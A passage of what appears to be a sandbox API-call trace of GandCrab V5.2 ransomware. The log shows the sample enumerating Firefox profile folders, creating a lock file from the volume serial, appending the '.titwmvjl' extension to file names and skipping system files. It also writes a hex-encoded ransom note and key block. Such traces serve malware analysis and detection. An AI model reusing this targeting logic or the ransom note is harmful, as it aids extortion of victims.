4\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0082.205] WriteFile (in: hFile=0x248, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e2fc, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e2fc*=0x2162, lpOverlapped=0x0) returned 1 [0082.206] CloseHandle (hObject=0x248) returned 1 [0082.206] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.207] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.207] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1b, wMilliseconds=0x203)) [0082.207] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.207] GetWindowsDirectoryW (in: lpBuffer=0x2310000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0082.207] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2310200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2310600, lpMaximumComponentLength=0x2310608, lpFileSystemFlags=0x2310604, lpFileSystemNameBuffer=0x2310400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2310600*=0xd2ca4def, lpMaximumComponentLength=0x2310608*=0xff, lpFileSystemFlags=0x2310604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0082.208] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\d2ca4a09d2ca4deb61a.lock") returned 123 [0082.208] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp\\winnt_x86-msvc\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x248 [0082.208] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.209] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.209] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\") returned 99 [0082.209] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\*" [0082.209] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\*", fInfoLevelId=0x1, lpFindFileData=0x259e318, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e318) returned 0x5032f8 [0082.209] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.209] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0082.210] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.210] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.210] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0082.210] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0082.210] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0082.210] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\d2ca4a09d2ca4deb61a.lock" [0082.210] lstrlenW (lpString=".titwmvjl") returned 9 [0082.210] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\d2ca4a09d2ca4deb61a.lock") returned 123 [0082.210] VirtualAlloc (lpAddress=0x0, dwSize=0x136, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.210] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 132 [0082.210] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\d2ca4a09d2ca4deb61a.lock") returned 123 [0082.210] lstrlenW (lpString=".lock") returned 5 [0082.210] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.210] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".lock ") returned 6 [0082.211] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.211] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.211] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0082.211] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0082.211] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0082.211] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\TITWMVJL-DECRYPT.txt" [0082.211] lstrlenW (lpString=".titwmvjl") returned 9 [0082.211] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\TITWMVJL-DECRYPT.txt") returned 119 [0082.211] VirtualAlloc (lpAddress=0x0, dwSize=0x12e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.211] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 128 [0082.211] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\TITWMVJL-DECRYPT.txt") returned 119 [0082.211] lstrlenW (lpString=".txt") returned 4 [0082.211] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.211] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".txt ") returned 5 [0082.212] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0082.212] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.212] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\TITWMVJL-DECRYPT.txt") returned 119 [0082.212] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\TITWMVJL-DECRYPT.txt") returned 119 [0082.212] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0082.212] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0082.212] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0082.212] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0082.212] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0082.212] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0082.212] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0082.212] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0082.212] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.212] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 0 [0082.212] FindClose (in: hFindFile=0x5032f8 | out: hFindFile=0x5032f8) returned 1 [0082.212] CloseHandle (hObject=0x248) returned 1 [0082.213] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0082.213] FindClose (in: hFindFile=0x503438 | out: hFindFile=0x503438) returned 1 [0082.214] CloseHandle (hObject=0x2d4) returned 1 [0082.214] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0082.214] lstrcmpW (lpString1="gmp-gmpopenh264", lpString2=".") returned 1 [0082.214] lstrcmpW (lpString1="gmp-gmpopenh264", lpString2="..") returned 1 [0082.214] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="gmp-gmpopenh264" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264" [0082.214] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\" [0082.214] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0082.214] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.214] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0082.214] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.215] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0082.215] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.215] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0082.215] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.215] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0082.215] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.215] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.215] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\\\TITWMVJL-DECRYPT.txt") returned 117 [0082.216] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-gmpopenh264\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0082.217] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20